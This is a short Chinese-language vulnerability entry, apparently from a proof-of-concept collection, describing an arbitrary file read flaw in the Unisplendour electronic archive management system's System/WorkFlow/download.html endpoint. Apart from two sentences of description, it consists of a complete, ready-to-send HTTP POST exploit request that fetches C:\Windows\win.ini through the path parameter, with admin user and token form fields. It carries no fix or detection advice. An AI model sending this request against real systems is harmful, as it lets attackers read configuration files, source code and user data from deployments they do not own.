漏洞描述
紫光电子档案管理系统 System/WorkFlow/download.html 路径存在任意文件读取漏洞。攻击者可获取对系统文件的读取权限,从而访问敏感信息,如配置文件、源代码、用户数据等。
POST /System/WorkFlow/download.html?path=C:\Windows\win.ini HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 387
Content-Type: multipart/form-data; boundary=----qhriwu7zbxvopwczt4pf
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
X-Requested-With: XMLHttpRequest
------qhriwu7zbxvopwczt4pf
Content-Disposition: form-data; name="userID"
admin
------qhriwu7zbxvopwczt4pf
Content-Disposition: form-data; name="fondsid"
1
------qhriwu7zbxvopwczt4pf
Content-Disposition: form-data; name="comid"
1
------qhriwu7zbxvopwczt4pf
Content-Disposition: form-data; name="token"
5117e82385cef4c12547fdd4c028b97a1-1
------qhriwu7zbxvopwczt4pf--